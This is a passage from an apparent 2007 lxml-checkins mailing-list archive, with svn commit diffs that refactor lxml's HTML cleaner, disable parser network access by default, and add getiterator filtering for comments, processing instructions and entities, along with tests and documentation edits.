doc.getiterator('link'): + if 'stylesheet' in el.get('rel', '').lower(): el.drop_element() - for el in doc.xpath('descendant-or-self::*[@style]'): + for el in _find_styled_elements(doc): del el.attrib['style'] if links: kill_tags.add('link') @@ -288,25 +296,21 @@ if allow_tags: raise ValueError( "It does not make sense to pass in both allow_tags and remove_unknown_tags") - allow_tags = defs.tags + allow_tags = set(defs.tags) if allow_tags: bad = [] for el in doc.getiterator(): if el.tag not in allow_tags: bad.append(el) - for el in bad: - if strip_tags: + if strip_tags: + for el in bad: el.drop_tag() - else: - # FIXME: Should we test if this has been removed because of a parent? + else: + for el in bad: el.drop_element() if add_nofollow: - for el in doc.xpath('descendant-or-self::a[@href]'): - href = el.attrib['href'] - if not href or href.startswith('#'): - # internal link, we don't care - continue - el.attrib['rel'] = 'nofollow' + for el in _find_external_links(doc): + el.set('rel', 'nofollow') def _remove_javascript(link): # links like "j a v a s c r i p t:" might be interpreted in IE From ianb at codespeak.net Thu Jun 7 18:56:07 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Thu, 7 Jun 2007 18:56:07 +0200 (CEST) Subject: [Lxml-checkins] r44100 - lxml/branch/html/src/lxml/html Message-ID: <20070607165607.0ED2B80E5@code0.codespeak.net> Author: ianb Date: Thu Jun 7 18:56:06 2007 New Revision: 44100 Modified: lxml/branch/html/src/lxml/html/clean.py Log: improve autolink_html a bit; add some comments and doc stuff Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 18:56:06 2007 @@ -45,6 +45,7 @@ _whitespace_re = re.compile(r'\s+') # FIXME: should data: be blocked? +# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx _conditional_comment_re = re.compile( r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S) @@ -440,9 +441,19 @@ return leading_text, links def autolink_html(html, *args, **kw): - doc = parse(html) + if isinstance(html, basestring): + doc = parse(html) + return_string = True + else: + doc = copy.deepcopy(html) + return_string = False autolink(doc, *args, **kw) - return tostring(doc) + if return_string: + return tostring(doc) + else: + return doc + +autolink_html.__doc__ = autolink.__doc__ _avoid_word_break_elements = ['pre', 'textarea', 'code'] _avoid_word_break_classes = ['nobreak'] @@ -455,7 +466,7 @@ Breaks any long words found in the body of the text (not attributes). Doesn't effect any of the tags in avoid_elements, by default - textarea and pre + ``<textarea>`` and ``<pre>`` Breaks words by inserting ​, which is a unicode character for Zero Width Space character. This generally takes up no space @@ -524,9 +535,20 @@ _decomment_re = re.compile(r'/\*.*?\*/', re.S) def _has_sneaky_javascript(style): + """ + Depending on the browser, stuff like ``e x p r e s s i o n(...)`` + can get interpreted, or ``expre/* stuff */ssion(...)``. This + checks for attempt to do stuff like this. + + Typically the response will be to kill the entire style; if you + have just a bit of Javascript in the style another rule will catch + that and remove only the Javascript from the style; this catches + more sneaky attempts. + """ style = _decomment_re.sub('', style) style = style.replace('\\', '') style = _whitespace_re.sub('', style) + style = style.lower() if 'javascript:' in style: return True if 'expression(' in style: From ianb at codespeak.net Thu Jun 7 19:35:38 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Thu, 7 Jun 2007 19:35:38 +0200 (CEST) Subject: [Lxml-checkins] r44104 - in lxml/branch/html: . doc src/lxml src/lxml/tests Message-ID: <20070607173538.92E1980C0@code0.codespeak.net> Author: ianb Date: Thu Jun 7 19:35:37 2007 New Revision: 44104 Modified: lxml/branch/html/TODO.txt lxml/branch/html/doc/FAQ.txt lxml/branch/html/doc/build.txt lxml/branch/html/doc/tutorial.txt lxml/branch/html/src/lxml/builder.py lxml/branch/html/src/lxml/parser.pxi lxml/branch/html/src/lxml/tests/test_etree.py lxml/branch/html/src/lxml/tests/test_xslt.py Log: svn merge -r43854:HEAD http://codespeak.net/svn/lxml/trunk Modified: lxml/branch/html/TODO.txt ============================================================================== --- lxml/branch/html/TODO.txt (original) +++ lxml/branch/html/TODO.txt Thu Jun 7 19:35:37 2007 @@ -58,6 +58,10 @@ * clean up (and remove?) duplicated API for extension functions +* allow (and prefer) Namespace classes local to a parser + +* remove first 'context' argument from extension functions + * find a way to integrate Schematron (if it's available) * always use ns-prefixed type names in objectify's ``xsi:type`` attributes @@ -68,3 +72,9 @@ * follow PEP 8 in API naming (avoidCamelCase in_favour_of_underscores) * clean support for entities (maybe an Entity element class?) + + +Changes in 2.0 +-------------- + +* network access in parsers disabled by default Modified: lxml/branch/html/doc/FAQ.txt ============================================================================== --- lxml/branch/html/doc/FAQ.txt (original) +++ lxml/branch/html/doc/FAQ.txt Thu Jun 7 19:35:37 2007 @@ -258,7 +258,12 @@ b) If you are using threads, please see the following section to check if you touch on one of the potential pitfalls. -c) Otherwise, we would really like to hear about it. Please report it to the +c) Try to reproduce the problem with the latest versions of libxml2 and + libxslt. From time to time, bugs and race conditions are found in these + libraries, so a more recent version might already contain a fix for your + problem. + +d) Otherwise, we would really like to hear about it. Please report it to the `mailing list`_ so that we can fix it. It is very helpful in this case if you can come up with a short code snippet that demonstrates your problem. Please also report the version of lxml, libxml2 and libxslt that you are Modified: lxml/branch/html/doc/build.txt ============================================================================== --- lxml/branch/html/doc/build.txt (original) +++ lxml/branch/html/doc/build.txt Thu Jun 7 19:35:37 2007 @@ -44,7 +44,7 @@ http://codespeak.net/svn/lxml/pyrex/ A subversion checkout of lxml will automatically retrieve the latest Pyrex - as external project source (``svn:externals``). Look out for the ``Pyrex`` + as external project source (``svn:externals``). Look for the ``Pyrex`` directory in the source tree. Since version 1.1.2, the lxml source distribution also includes this Pyrex @@ -182,6 +182,26 @@ lxml maintainer. +Providing newer library versions on Mac-OS X +-------------------------------------------- + +The Unix environment in Mac-OS X makes it relatively easy to install +Unix/Linux style package management tools and new software. However, it seems +to be hard to get libraries set up for exclusive usage that Mac-OS X ships in +an older version. The result can be segfaults on this platform that are hard +to track down. + +To make sure the newer libxml2 and libxslt versions are used (e.g. under +fink), you should add the directory where you installed the libraries to the +``DYLD_LIBRARY_PATH`` environment variable. This seems to fix a lot of +problems for users. + +Alternatively, you can build lxml statically. A way to do this on MS Windows +is described in the next section, but it should be easy to adapt it for +Mac-OS. That way, you can always be sure you use the versions you compiled +lxml with, regardless of the runtime environement. + + Static linking on Windows ------------------------- Modified: lxml/branch/html/doc/tutorial.txt ============================================================================== --- lxml/branch/html/doc/tutorial.txt (original) +++ lxml/branch/html/doc/tutorial.txt Thu Jun 7 19:35:37 2007 @@ -329,11 +329,11 @@ .. _`further iterators`: api.html#iteration - - The ElementTree class ===================== +An ``ElementTree`` is mainly a wrapper around a tree with a root node. + Parsing files and XML literals ============================== Modified: lxml/branch/html/src/lxml/builder.py ============================================================================== --- lxml/branch/html/src/lxml/builder.py (original) +++ lxml/branch/html/src/lxml/builder.py Thu Jun 7 19:35:37 2007 @@ -16,9 +16,6 @@ return lambda *args, **kwargs: func(tag, *args, **kwargs) -class _C: - pass - class ElementMaker(object): """Element generator factory. @@ -97,7 +94,12 @@ </html> """ - def __init__(self, typemap=None): + def __init__(self, typemap=None, parser=None): + if parser is not None: + self._makeelement = parser.makeelement + else: + self._makeelement = ET.Element + # initialize type map for this element factory if typemap: @@ -121,20 +123,12 @@ attrib[k] = typemap[type(v)](None, v) typemap[dict] = add_dict - def add_elem(elem, item): - elem.append(item) - t = type(ET.Element("tag")) - if t is not type(_C()): - typemap[t] = add_elem - self._typemap = typemap - # print typemap - def __call__(self, tag, *children, **attrib): get = self._typemap.get - elem = ET.Element(tag) + elem = self._makeelement(tag) if attrib: get(dict)(elem, attrib) Modified: lxml/branch/html/src/lxml/parser.pxi ============================================================================== --- lxml/branch/html/src/lxml/parser.pxi (original) +++ lxml/branch/html/src/lxml/parser.pxi Thu Jun 7 19:35:37 2007 @@ -665,8 +665,9 @@ cdef int _XML_DEFAULT_PARSE_OPTIONS _XML_DEFAULT_PARSE_OPTIONS = ( - xmlparser.XML_PARSE_NOENT | + xmlparser.XML_PARSE_NOENT | xmlparser.XML_PARSE_NOCDATA | + xmlparser.XML_PARSE_NONET | xmlparser.XML_PARSE_COMPACT ) @@ -685,19 +686,19 @@ * attribute_defaults - read default attributes from DTD * dtd_validation - validate (if DTD is available) * load_dtd - use DTD for parsing - * no_network - prevent network access + * no_network - prevent network access (default: True) * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes - * compact - safe memory for short text content (default: on) - * resolve_entities - replace entities by their text value (default: on) + * compact - safe memory for short text content (default: True) + * resolve_entities - replace entities by their text value (default: True) Note that you should avoid sharing parsers between threads. While this is not harmful, it is more efficient to use separate parsers. This does not apply to the default parser. """ def __init__(self, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, ns_clean=False, + load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, resolve_entities=True): cdef int parse_options @@ -712,14 +713,14 @@ if attribute_defaults: parse_options = parse_options | xmlparser.XML_PARSE_DTDATTR | \ xmlparser.XML_PARSE_DTDLOAD - if no_network: - parse_options = parse_options | xmlparser.XML_PARSE_NONET if ns_clean: parse_options = parse_options | xmlparser.XML_PARSE_NSCLEAN if recover: parse_options = parse_options | xmlparser.XML_PARSE_RECOVER if remove_blank_text: parse_options = parse_options | xmlparser.XML_PARSE_NOBLANKS + if not no_network: + parse_options = parse_options ^ xmlparser.XML_PARSE_NONET if not compact: parse_options = parse_options ^ xmlparser.XML_PARSE_COMPACT if not resolve_entities: @@ -777,7 +778,15 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(_BaseParser parser=None): +def setDefaultParser(parser): + "Deprecated, please use set_default_parser instead." + set_default_parser(parser) + +def getDefaultParser(): + "Deprecated, please use get_default_parser instead." + return get_default_parser() + +def set_default_parser(_BaseParser parser=None): """Set a default parser for the current thread. This parser is used globally whenever no parser is supplied to the various parse functions of the lxml API. If this function is called without a parser (or if it is @@ -791,24 +800,19 @@ parser = __DEFAULT_XML_PARSER __GLOBAL_PARSER_CONTEXT.setDefaultParser(parser) -def getDefaultParser(): - return __GLOBAL_PARSER_CONTEXT.getDefaultParser() - -def set_default_parser(parser): - "Deprecated, please use setDefaultParser instead." - setDefaultParser(parser) - def get_default_parser(): - "Deprecated, please use getDefaultParser instead." - return getDefaultParser() + return __GLOBAL_PARSER_CONTEXT.getDefaultParser() ############################################################ ## HTML parser ############################################################ cdef int _HTML_DEFAULT_PARSE_OPTIONS -_HTML_DEFAULT_PARSE_OPTIONS = \ +_HTML_DEFAULT_PARSE_OPTIONS = ( + htmlparser.HTML_PARSE_RECOVER | + htmlparser.HTML_PARSE_NONET | htmlparser.HTML_PARSE_COMPACT + ) cdef class HTMLParser(_BaseParser): """The HTML parser. This parser allows reading HTML into a normal XML @@ -817,25 +821,25 @@ Available boolean keyword arguments: * recover - try hard to parse through broken HTML (default: True) - * no_network - prevent network access + * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes - * compact - safe memory for short text content (default: on) + * compact - safe memory for short text content (default: True) - Note that you should avoid sharing parsers between threads for parformance + Note that you should avoid sharing parsers between threads for performance reasons. """ - def __init__(self, recover=True, no_network=False, remove_blank_text=False, + def __init__(self, recover=True, no_network=True, remove_blank_text=False, compact=True): cdef int parse_options _BaseParser.__init__(self) parse_options = _HTML_DEFAULT_PARSE_OPTIONS - if recover: - parse_options = parse_options | htmlparser.HTML_PARSE_RECOVER - if no_network: - parse_options = parse_options | htmlparser.HTML_PARSE_NONET if remove_blank_text: parse_options = parse_options | htmlparser.HTML_PARSE_NOBLANKS + if not recover: + parse_options = parse_options ^ htmlparser.HTML_PARSE_RECOVER + if not no_network: + parse_options = parse_options ^ htmlparser.HTML_PARSE_NONET if not compact: parse_options = parse_options ^ htmlparser.HTML_PARSE_COMPACT Modified: lxml/branch/html/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_etree.py (original) +++ lxml/branch/html/src/lxml/tests/test_etree.py Thu Jun 7 19:35:37 2007 @@ -390,22 +390,23 @@ xml = u'<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' self.assertRaises(_LocalException, parse, StringIO(xml), parser) - def test_entity(self): - parse = self.etree.parse - tostring = self.etree.tostring - parser = self.etree.XMLParser(resolve_entities=False) - Entity = self.etree.Entity + if etree.LIBXML_VERSION > (2,6,20): + def test_entity_parse(self): + parse = self.etree.parse + tostring = self.etree.tostring + parser = self.etree.XMLParser(resolve_entities=False) + Entity = self.etree.Entity + + xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' + tree = parse(StringIO(xml), parser) + root = tree.getroot() + self.assertEquals(root[0].tag, Entity) + self.assertFalse(root[0].text) + self.assertEquals(root[0].tail, None) + self.assertEquals(root[0].name, "myentity") - xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' - tree = parse(StringIO(xml), parser) - root = tree.getroot() - self.assertEquals(root[0].tag, Entity) - self.assertFalse(root[0].text) - self.assertEquals(root[0].tail, None) - self.assertEquals(root[0].name, "myentity") - - self.assertEquals('<doc>&myentity;</doc>', - tostring(root)) + self.assertEquals('<doc>&myentity;</doc>', + tostring(root)) def test_entity_append(self): Entity = self.etree.Entity Modified: lxml/branch/html/src/lxml/tests/test_xslt.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_xslt.py (original) +++ lxml/branch/html/src/lxml/tests/test_xslt.py Thu Jun 7 19:35:37 2007 @@ -37,19 +37,18 @@ def test_xslt_input_none(self): self.assertRaises(TypeError, etree.XSLT, None) - def test_xslt_invalid_stylesheet(self): - if etree.LIBXSLT_VERSION < (1,1,15): - return # no error from libxslt? - - style = self.parse('''\ + if False and etree.LIBXSLT_VERSION >= (1,1,15): + # earlier versions generate no error + if etree.LIBXSLT_VERSION > (1,1,17): + def test_xslt_invalid_stylesheet(self): + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:template match="/"> - <xsl:template /> - </xsl:template> + <xsl:stylesheet /> </xsl:stylesheet>''') - self.assertRaises(etree.XSLTParseError, etree.XSLT, style) + self.assertRaises( + etree.XSLTParseError, etree.XSLT, style) def test_xslt_utf8(self): tree = self.parse(u'<a><b>\uF8D2</b><c>\uF8D2</c></a>') @@ -242,13 +241,12 @@ ''', st.tostring(res)) - def test_xslt_parameter_missing(self): - # DISABLED - NOT RELIABLE! - if etree.LIBXSLT_VERSION >= (1,1,18): - return # no error from libxslt? - # apply() without needed parameter will lead to XSLTApplyError - tree = self.parse('<a><b>B</b><c>C</c></a>') - style = self.parse('''\ + if etree.LIBXSLT_VERSION < (1,1,18): + # later versions produce no error + def test_xslt_parameter_missing(self): + # apply() without needed parameter will lead to XSLTApplyError + tree = self.parse('<a><b>B</b><c>C</c></a>') + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> @@ -256,9 +254,9 @@ </xsl:template> </xsl:stylesheet>''') - st = etree.XSLT(style) - self.assertRaises(etree.XSLTApplyError, - st.apply, tree) + st = etree.XSLT(style) + self.assertRaises(etree.XSLTApplyError, + st.apply, tree) def test_xslt_multiple_parameters(self): tree = self.parse('<a><b>B</b><c>C</c></a>') From scoder at codespeak.net Thu Jun 7 20:48:20 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 20:48:20 +0200 (CEST) Subject: [Lxml-checkins] r44106 - lxml/branch/html/src/lxml/html Message-ID: <20070607184820.95BC5808F@code0.codespeak.net> Author: scoder Date: Thu Jun 7 20:48:20 2007 New Revision: 44106 Modified: lxml/branch/html/src/lxml/html/clean.py Log: getiterator() instead of .xpath() Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 20:48:20 2007 @@ -168,7 +168,7 @@ el.drop_element() # First, handle a case that IE treats <image> like <img>, and that can # confuse either this step or later steps. - for el in doc.xpath('descendant-or-self::image'): + for el in doc.getiterator('image'): el.tag = 'img' kill_tags = set() remove_tags = set(remove_tags or ()) From scoder at codespeak.net Sat Jun 9 10:05:32 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 10:05:32 +0200 (CEST) Subject: [Lxml-checkins] r44110 - lxml/branch/html/src/lxml Message-ID: <20070609080532.9263E80CB@code0.codespeak.net> Author: scoder Date: Sat Jun 9 10:05:31 2007 New Revision: 44110 Modified: lxml/branch/html/src/lxml/parser.pxi Log: missing default kw arg Modified: lxml/branch/html/src/lxml/parser.pxi ============================================================================== --- lxml/branch/html/src/lxml/parser.pxi (original) +++ lxml/branch/html/src/lxml/parser.pxi Sat Jun 9 10:05:31 2007 @@ -778,7 +778,7 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(parser): +def setDefaultParser(parser=None): "Deprecated, please use set_default_parser instead." set_default_parser(parser) From scoder at codespeak.net Sat Jun 9 10:06:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 10:06:40 +0200 (CEST) Subject: [Lxml-checkins] r44111 - in lxml/branch/html: . src/lxml src/lxml/html src/lxml/tests Message-ID: <20070609080640.DE8A880CB@code0.codespeak.net> Author: scoder Date: Sat Jun 9 10:06:40 2007 New Revision: 44111 Modified: lxml/branch/html/CHANGES.txt lxml/branch/html/src/lxml/apihelpers.pxi lxml/branch/html/src/lxml/etree.pyx lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/tests/test_elementtree.py lxml/branch/html/src/lxml/tests/test_etree.py Log: support for Comment, PI and Entity in getiterator(tag) Modified: lxml/branch/html/CHANGES.txt ============================================================================== --- lxml/branch/html/CHANGES.txt (original) +++ lxml/branch/html/CHANGES.txt Sat Jun 9 10:06:40 2007 @@ -50,6 +50,9 @@ Bugs fixed ---------- +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath Modified: lxml/branch/html/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/html/src/lxml/apihelpers.pxi (original) +++ lxml/branch/html/src/lxml/apihelpers.pxi Sat Jun 9 10:06:40 2007 @@ -459,6 +459,9 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node.type != tree.XML_ELEMENT_NODE: + # not an element, only succeed if we match everything + return c_name is NULL and c_href is NULL if c_name is NULL: if c_href is NULL: # always match Modified: lxml/branch/html/src/lxml/etree.pyx ============================================================================== --- lxml/branch/html/src/lxml/etree.pyx (original) +++ lxml/branch/html/src/lxml/etree.pyx Sat Jun 9 10:06:40 2007 @@ -1631,17 +1631,24 @@ cdef public class _ElementTagMatcher [ object LxmlElementTagMatcher, type LxmlElementTagMatcherType ]: cdef object _pystrings + cdef int _node_type cdef char* _href cdef char* _name cdef _initTagMatch(self, tag): + self._href = NULL + self._name = NULL if tag is None: - self._href = NULL - self._name = NULL + self._node_type = 0 + elif tag is Comment: + self._node_type = tree.XML_COMMENT_NODE + elif tag is ProcessingInstruction: + self._node_type = tree.XML_PI_NODE + elif tag is Entity: + self._node_type = tree.XML_ENTITY_REF_NODE else: + self._node_type = tree.XML_ELEMENT_NODE self._pystrings = _getNsTag(tag) - if self._pystrings[0] is None: - self._href = NULL - else: + if self._pystrings[0] is not None: self._href = _cstr(self._pystrings[0]) self._name = _cstr(self._pystrings[1]) if self._name[0] == c'*' and self._name[1] == c'\0': @@ -1659,7 +1666,9 @@ cdef xmlNode* c_node c_node = self._next_element(node._c_node) while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is NULL: self._node = None @@ -1690,7 +1699,9 @@ self._next_element = _nextElement if tag is not None: while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is not NULL: # store Python ref: @@ -1736,14 +1747,15 @@ # keep next node to return and a depth counter in the tree cdef _Element _next_node cdef _Element _top_node - cdef int _include_all_types def __init__(self, _Element node not None, tag=None, inclusive=True): self._top_node = node self._next_node = node self._initTagMatch(tag) - if tag is not None and \ - not _tagMatches(node._c_node, self._href, self._name) or \ - not inclusive: + if not inclusive or \ + tag is not None and \ + self._node_type != 0 and \ + (self._node_type != node._c_node.type or + not _tagMatches(node._c_node, self._href, self._name)): # this cannot raise StopIteration, self._next_node != None self.next() @@ -1769,7 +1781,8 @@ cdef xmlNode* _nextNodeAnyTag(self, xmlNode* c_node): tree.BEGIN_FOR_EACH_ELEMENT_FROM(self._top_node._c_node, c_node, 0) - return c_node + if self._node_type == 0 or self._node_type == c_node.type: + return c_node tree.END_FOR_EACH_ELEMENT_FROM(c_node) return NULL Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sat Jun 9 10:06:40 2007 @@ -160,9 +160,8 @@ # comments that could be conditional if not comments: bad = [] - for el in doc.getiterator(): - if (isinstance(el, etree.CommentBase) - and _conditional_comment_re.search(el.text)): + for el in doc.getiterator(etree.Comment): + if _conditional_comment_re.search(el.text): bad.append(el) for el in bad: el.drop_element() Modified: lxml/branch/html/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/html/src/lxml/tests/test_elementtree.py Sat Jun 9 10:06:40 2007 @@ -1419,6 +1419,56 @@ [a2], list(c.getiterator('a'))) + def test_getiterator_filter_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + comment_b = Comment("TEST-b") + b.append(comment_b) + + self.assertEquals( + [comment_b], + list(a.getiterator(Comment))) + + comment_a = Comment("TEST-a") + a.append(comment_a) + + self.assertEquals( + [comment_b, comment_a], + list(a.getiterator(Comment))) + + self.assertEquals( + [comment_b], + list(b.getiterator(Comment))) + + def test_getiterator_filter_pi(self): + Element = self.etree.Element + PI = self.etree.ProcessingInstruction + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + pi_b = PI("TEST-b") + b.append(pi_b) + + self.assertEquals( + [pi_b], + list(a.getiterator(PI))) + + pi_a = PI("TEST-a") + a.append(pi_a) + + self.assertEquals( + [pi_b, pi_a], + list(a.getiterator(PI))) + + self.assertEquals( + [pi_b], + list(b.getiterator(PI))) + def test_getiterator_with_text(self): Element = self.etree.Element SubElement = self.etree.SubElement Modified: lxml/branch/html/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_etree.py (original) +++ lxml/branch/html/src/lxml/tests/test_etree.py Sat Jun 9 10:06:40 2007 @@ -1229,6 +1229,31 @@ [d, f], list(a.getiterator('{b}*'))) + def test_getiterator_filter_entities(self): + Element = self.etree.Element + Entity = self.etree.Entity + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + entity_b = Entity("TEST-b") + b.append(entity_b) + + self.assertEquals( + [entity_b], + list(a.getiterator(Entity))) + + entity_a = Entity("TEST-a") + a.append(entity_a) + + self.assertEquals( + [entity_b, entity_a], + list(a.getiterator(Entity))) + + self.assertEquals( + [entity_b], + list(b.getiterator(Entity))) + def test_findall_ns(self): XML = self.etree.XML root = XML('<a xmlns:x="X" xmlns:y="Y"><x:b><c/></x:b><b/><c><x:b/><b/></c><b/></a>') From scoder at codespeak.net Sat Jun 9 16:44:53 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 16:44:53 +0200 (CEST) Subject: [Lxml-checkins] r44115 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070609144453.3F0E380BC@code0.codespeak.net> Author: scoder Date: Sat Jun 9 16:44:51 2007 New Revision: 44115 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/diff.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: renamed drop_tag to drop_element and drop_element to drop_tree, some more cleanup Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Sat Jun 9 16:44:51 2007 @@ -11,31 +11,31 @@ _rel_links_xpath = etree.XPath("descendant-or-self::a[@rel]") #_class_xpath = etree.XPath(r"descendant-or-self::*[regexp:match(@class, concat('\b', $class_name, '\b'))]", {'regexp': 'http://exslt.org/regular-expressions'}) -_class_xpath = etree.XPath("descendant-or-self::*[contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") +_class_xpath = etree.XPath("descendant-or-self::*[@class and contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") _id_xpath = etree.XPath("descendant-or-self::*[@id=$id]") +_collect_string_content = etree.XPath("string()") _css_url_re = re.compile(r'url\((.*?)\)', re.I) _css_import_re = re.compile(r'@import "(.*?)"') class HtmlMixin(object): - def drop_element(self): + def drop_tree(self): """ Removes this element from the tree, including its children and text. The tail text is joined to the previous element or parent. """ parent = self.getparent() - assert parent - index = parent.index(self) + assert parent is not None if self.tail: - if index == 0: + previous = self.getprevious() + if previous is None: parent.text = (parent.text or '') + self.tail else: - previous = parent[index-1] previous.tail = (previous.tail or '') + self.tail parent.remove(self) - def drop_tag(self): + def drop_element(self): """ Remove the tag, but not its children or text. The children and text are merged into the parent. @@ -43,29 +43,28 @@ Example:: >>> h = parse_element('<div>Hello <b>World!</b></div>') - >>> h.xpath('//b')[0].drop_tag() + >>> h.find('//b').drop_element() >>> print tostring(h) <div>Hello World!</div> """ parent = self.getparent() - assert parent - index = parent.index(self) + assert parent is not None + previous = self.getprevious() if self.text: - if index == 0: + if previous is None: parent.text = (parent.text or '') + self.text else: - prev = parent[index-1] - prev.tail = (prev.tail or '') + self.text + previous.tail = (previous.tail or '') + self.text if self.tail: if len(self): last = self[-1] last.tail = (last.tail or '') + self.tail - elif index == 0: + elif previous is None: parent.text = (parent.text or '') + self.tail else: - prev = parent[index-1] - prev.tail = (prev.tail or '') + self.tail - parent[index:index+1] = list(self) + previous.tail = (previous.tail or '') + self.tail + index = parent.index(self) + parent[index:index+1] = self[:] def find_rel_links(self, rel): """ @@ -73,7 +72,7 @@ """ rel = rel.lower() return [el for el in _rel_links_xpath(self) - if el.attrib['rel'].lower() == rel] + if el.get('rel').lower() == rel] def find_class(self, class_name): """ @@ -103,7 +102,7 @@ """ Return the text content of the tag (and the text in any children). """ - return self.xpath("string()") + return _collect_string_content(self) ######################################## ## Link functions @@ -134,8 +133,8 @@ base_href = None basetags = self.xpath('//base[@href]') for b in basetags: - base_href = b.attrib['href'] - b.drop_element() + base_href = b.get('href') + b.drop_tree() if not base_href: return self.make_links_absolute(base_href, resolve_base_href=False) @@ -370,7 +369,7 @@ body.extend(other_body) # We'll ignore tail # I guess we are ignoring attributes too - other_body.drop_element() + other_body.drop_tree() else: body = None heads = doc.findall('head') @@ -381,7 +380,7 @@ for other_head in heads[1:]: head.extend(other_head) # We don't care about text or tail in a head - other_head.drop_element() + other_head.drop_tree() return doc if (len(body) == 1 and (not body.text or not body.text.strip()) and (not body[-1].tail or not body[-1].tail.strip())): Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sat Jun 9 16:44:51 2007 @@ -53,7 +53,7 @@ "descendant-or-self::*[@style]") _find_external_links = etree.XPath( - "descendant-or-self::a[string(@href) and substring(@href,0,1) != '#']") + "descendant-or-self::a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']") def clean_html(html, **kw): """ @@ -164,7 +164,7 @@ if _conditional_comment_re.search(el.text): bad.append(el) for el in bad: - el.drop_element() + el.drop_tree() # First, handle a case that IE treats <image> like <img>, and that can # confuse either this step or later steps. for el in doc.getiterator('image'): @@ -205,7 +205,7 @@ el.set('style', new) for el in list(doc.getiterator('style')): if el.get('type', '').lower().strip() == 'text/javascript': - el.drop_element() + el.drop_tree() continue old = el.text or '' new = _css_javascript_re.sub('', old) @@ -230,9 +230,9 @@ # del el.attrib['xmlns'] if style: kill_tags.add('style') - for el in doc.getiterator('link'): + for el in list(doc.getiterator('link')): if 'stylesheet' in el.get('rel', '').lower(): - el.drop_element() + el.drop_tree() for el in _find_styled_elements(doc): del el.attrib['style'] if links: @@ -288,9 +288,9 @@ el.clear() for el in _kill: - el.drop_element() + el.drop_tree() for el in _remove: - el.drop_tag() + el.drop_element() if remove_unknown_tags: if allow_tags: @@ -304,10 +304,10 @@ bad.append(el) if strip_tags: for el in bad: - el.drop_tag() + el.drop_element() else: for el in bad: - el.drop_element() + el.drop_tree() if add_nofollow: for el in _find_external_links(doc): el.set('rel', 'nofollow') @@ -356,7 +356,7 @@ """ if el.tag in avoid_elements: return - class_name = el.attrib.get('class') + class_name = el.get('class') if class_name: class_name = class_name.split() for match_class in avoid_classes: @@ -428,7 +428,7 @@ assert not leading_text leading_text = prev_text anchor = factory('a') - anchor.attrib['href'] = link + anchor.set('href', link) body = best_match.group('body') if not body: body = link @@ -478,7 +478,7 @@ # http://www.cs.tut.fi/~jkorpela/html/nobr.html if el.tag in _avoid_word_break_elements: return - class_name = el.attrib.get('class') + 